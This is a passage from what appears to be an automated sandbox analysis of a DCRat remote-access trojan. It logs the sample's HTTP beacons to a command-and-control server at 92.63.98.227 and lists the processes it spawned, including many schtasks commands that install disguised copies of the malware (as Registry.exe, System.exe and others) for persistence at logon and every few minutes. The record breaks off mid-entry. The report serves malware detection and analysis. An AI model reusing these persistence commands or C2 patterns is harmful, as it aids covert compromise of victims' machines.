            Aug 28, 2024 15:33:36.989923000 CEST705OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN HTTP/1.1
            Accept: */*
            Content-Type: text/csv
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            36 | 192.168.2.6 | 51885 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:33:41.559803963 CEST | 727 | OUT | GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            37 | 192.168.2.6 | 51886 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:33:42.164207935 CEST | 727 | OUT | GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            38 | 192.168.2.6 | 51887 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:33:42.796940088 CEST | 727 | OUT | GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            39 | 192.168.2.6 | 51888 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:33:43.416255951 CEST | 727 | OUT | GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            40 | 192.168.2.6 | 51889 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:33:57.934411049 CEST | 686 | OUT | GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN HTTP/1.1
            Accept: */*
            Content-Type: text/plain
            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            41 | 192.168.2.6 | 51890 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:33:58.587141037 CEST | 686 | OUT | GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN HTTP/1.1
            Accept: */*
            Content-Type: text/plain
            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            42 | 192.168.2.6 | 51891 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:33:59.198673964 CEST | 686 | OUT | GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN HTTP/1.1
            Accept: */*
            Content-Type: text/plain
            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            43 | 192.168.2.6 | 51892 | 92.63.98.227 | 80
            Timestamp | Bytes transferred | Direction | Data
            Aug 28, 2024 15:33:59.796047926 CEST | 686 | OUT | GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN HTTP/1.1
            Accept: */*
            Content-Type: text/plain
            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
            Host: 92.63.98.227
            Connection: Keep-Alive



            Target ID:0
            Start time:09:31:55
            Start date:28/08/2024
            Path:C:\Users\user\Desktop\XPC5PMKegV.exe
            Wow64 process (32bit):false
            Commandline:"C:\Users\user\Desktop\XPC5PMKegV.exe"
            Imagebase:0xa30000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2128952828.000000000315F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2128952828.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2128952828.0000000003143000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2129458279.0000000012E6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Reputation:low
            Has exited:true

            Target ID:2
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 9 /tr "'C:\Recovery\xMLVfJVxhYAkoCJ.exe'" /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:3
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Recovery\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:4
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 5 /tr "'C:\Recovery\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:5
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Recovery\xMLVfJVxhYAkoCJ.exe
            Wow64 process (32bit):false
            Commandline:C:\Recovery\xMLVfJVxhYAkoCJ.exe
            Imagebase:0xec0000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2209851318.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2209851318.000000000331F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Antivirus matches:
            • Detection: 79%, ReversingLabs
            Reputation:low
            Has exited:true

            Target ID:6
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 11 /tr "'C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe'" /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:7
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:8
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 11 /tr "'C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:9
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:10
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:11
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:12
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe'" /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:13
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:14
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:15
            Start time:09:31:56
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\microsoft.net\System.exe'" /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:16
            Start time:09:31:57
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\System.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:17
            Start time:09:31:57
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft.net\System.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:18
            Start time:09:31:57
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 10 /tr "'C:\Users\Default\NetHood\xMLVfJVxhYAkoCJ.exe'" /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:19
            Start time:09:31:57
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Users\Default\NetHood\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:20
            Start time:09:31:57
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 6 /tr "'C:\Users\Default\NetHood\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:21
            Start time:09:31:57
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe'" /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:22
            Start time:09:31:57
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:23
            Start time:09:31:57
            Start date:28/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Imagebase:0x7ff6b9de0000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:24
            Start time:09:31:57
            Start date:28/08/2024
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yrs7rIEeUp.bat"
            Imagebase:0x7ff72c040000
            File size:289'792 bytes
            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:25
            Start time:09:31:57
            Start date:28/08/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff66e660000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:26
            Start time:09:31:57
            Start date:28/08/2024
            Path:C:\Windows\System32\w32tm.exe
            Wow64 process (32bit):false
            Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
            Imagebase:0x7ff71cb50000
            File size:108'032 bytes
            MD5 hash:81A82132737224D324A3E8DA993E2FB5
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:27
            Start time:09:31:58
            Start date:28/08/2024
            Path:C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe"
            Imagebase:0xd10000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            • Detection: 79%, ReversingLabs
            Has exited:true

            Target ID:28
            Start time:09:31:58
            Start date:28/08/2024
            Path:C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe"
            Imagebase:0x410000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:29
            Start time:09:31:58
            Start date:28/08/2024
            Path:C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe"
            Imagebase:0x710000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001D.00000002.2235264042.0000000002981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            • Detection: 79%, ReversingLabs
            Has exited:true

            Target ID:30
            Start time:09:31:58
            Start date:28/08/2024
            Path:C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe"
            Imagebase:0xa50000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.2230198561.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.2230198561.0000000002E5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Has exited:true

            Target ID:31
            Start time:09:31:59
            Start date:28/08/2024
            Path:C:\Program Files (x86)\Microsoft.NET\System.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files (x86)\microsoft.net\System.exe"
            Imagebase:0xc90000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001F.00000002.2231952684.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001F.00000002.2231952684.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            • Detection: 79%, ReversingLabs
            Has exited:true

            Target ID:32
            Start time:09:31:59
            Start date:28/08/2024
            Path:C:\Program Files (x86)\Microsoft.NET\System.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files (x86)\microsoft.net\System.exe"
            Imagebase:0x440000
            File size:1'253'376 bytes
            MD5 hash:20CF7F39EDEF3DB30F388829C5A3F05C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000020.00000002.2230480855.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Has exited:true

            Target ID:33
            Start time:09:31:59
            Start date:28/08/2024
            Path:C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"
            Imagebase:0x5b0000
